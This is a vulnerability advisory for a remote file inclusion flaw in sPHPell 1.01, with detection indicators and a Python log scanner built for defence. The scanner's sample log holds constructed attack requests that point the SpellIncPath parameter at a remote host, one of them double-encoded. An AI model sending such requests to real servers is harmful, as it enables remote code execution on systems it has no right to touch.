CVE-2007-3522
published 2007-07-03


Priority: P351
CVSS 2.0: 6.8 (medium), vector AV:N/AC:M/Au:N/C:P/I:P/A:P
Tags: EXPLOIT
EPSS: 66.16% (99.2th percentile)
Multiple PHP remote file inclusion vulnerabilities in sPHPell 1.01 allow remote attackers to execute arbitrary PHP code via a URL in the SpellIncPath parameter to (1) spellcheckpageinc.php, (2) spellchecktext.php, (3) spellcheckwindow.php, or (4) spellcheckwindowframeset.php.

Affected (1 range)

Vendor  | Product | Version range | Fixed in
sphpell | sphpell |               |

Detection & IOCs (extracted from sources)

path: /checkpageinc.php?SpellIncPath=
path: /spellchecktext.php?SpellIncPath=
path: /spellcheckwindow.php?SpellIncPath=
path: /spellcheckwindowframeset.php?SpellIncPath=
filename: spellcheckpageinc.php
filename: spellchecktext.php
filename: spellcheckwindow.php
filename: spellcheckwindowframeset.php
  • Detect RFI exploitation attempts by monitoring HTTP requests that carry the 'SpellIncPath' parameter with an external URL value (e.g., http://) and target any of the four vulnerable sPHPell scripts.
  • The vulnerable sink is a bare `include($SpellIncPath."spellcheckvars.php")` call: any user-controlled URL prefix in SpellIncPath results in remote code execution. Alert on GET/POST requests where the SpellIncPath value begins with 'http://' or 'https://'.
  • The vulnerability only exists when PHP's 'allow_url_include' (and 'allow_url_fopen') directives are enabled, which is required for remote file inclusion to succeed.
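The detection rule above, as an added example that is not part of this record: a small scanner that reads Apache combined-format access log lines (an assumed log layout, with constructed sample lines) and flags requests to the four vulnerable sPHPell scripts whose SpellIncPath value decodes to an http:// or https:// prefix, including URL-encoded variants.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# The four sPHPell 1.01 scripts named in the CVE description.
VULNERABLE_SCRIPTS = {
    "spellcheckpageinc.php",
    "spellchecktext.php",
    "spellcheckwindow.php",
    "spellcheckwindowframeset.php",
}

# Apache combined/common log format (assumed layout): client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Constructed sample lines: two RFI attempts, one local include path, one request to a non-vulnerable script.
SAMPLE_LOG = [
    '203.0.113.5 - - [03/Jul/2007:10:15:32 +0000] "GET /sphpell/spellchecktext.php?SpellIncPath=http://198.51.100.7/evil/ HTTP/1.1" 200 512',
    '203.0.113.6 - - [03/Jul/2007:10:16:01 +0000] "GET /sphpell/spellcheckwindow.php?SpellIncPath=%2568ttp%253A%252F%252F198.51.100.7%252F HTTP/1.1" 200 498',
    '198.51.100.20 - - [03/Jul/2007:10:17:44 +0000] "GET /sphpell/spellchecktext.php?SpellIncPath=../inc/ HTTP/1.1" 200 512',
    '198.51.100.21 - - [03/Jul/2007:10:18:09 +0000] "GET /index.php?SpellIncPath=http://198.51.100.7/ HTTP/1.1" 200 1024',
]


def is_rfi_attempt(target: str) -> bool:
    """True when the request path is a vulnerable sPHPell script and SpellIncPath names a remote URL."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    if script not in VULNERABLE_SCRIPTS:
        return False
    # PHP request parameter names are case-sensitive, so match 'SpellIncPath' exactly.
    for value in parse_qs(parts.query, keep_blank_values=True).get("SpellIncPath", []):
        # parse_qs decodes once; a second unquote catches double-encoded prefixes such as %2568ttp.
        decoded = unquote(value).strip().lower()
        if decoded.startswith(("http://", "https://")):
            return True
    return False


def scan_log(lines):
    """Return (client_ip, method, request_target) for every line that looks like an RFI attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m["target"]):
            hits.append((m["ip"], m["method"], m["target"]))
    return hits
```

Lines that do not parse as combined-format entries are skipped rather than raising, so the scanner can run over a mixed or partially corrupted log.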